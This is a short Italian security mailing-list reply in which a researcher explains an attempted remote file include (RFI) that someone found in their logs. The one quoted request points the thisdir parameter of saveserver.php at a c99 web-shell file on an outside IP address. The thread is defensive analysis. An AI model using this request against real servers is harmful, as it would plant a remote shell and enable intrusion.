David Galligani wrote:
/admin/business_inc/saveserver.php?thisdir=http://80.231.130.12/wwwroot/c99.txt?
E' un tentativo di eseguire una RFI (remote file include) su quella pagina (saveserver.php). Se il parametro thisdir non e' correttamente validato, il file PHP che hai visto viene eseguito sul tuo server. Pero' l'exploit non e' in quel file: quello e' solo il payload.
<[EMAIL PROTECTED]>
Puoi segnalarlo agli abuse di Google. -- Cordiali saluti, Stefano Zanero Politecnico di Milano - Dip. Elettronica e Informazione Via Ponzio, 34/5 I-20133 Milano - ITALY Tel. +39 02 2399-4017 Fax. +39 02 2399-3411 E-mail: [EMAIL PROTECTED] Web: http://home.dei.polimi.it/zanero/ ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
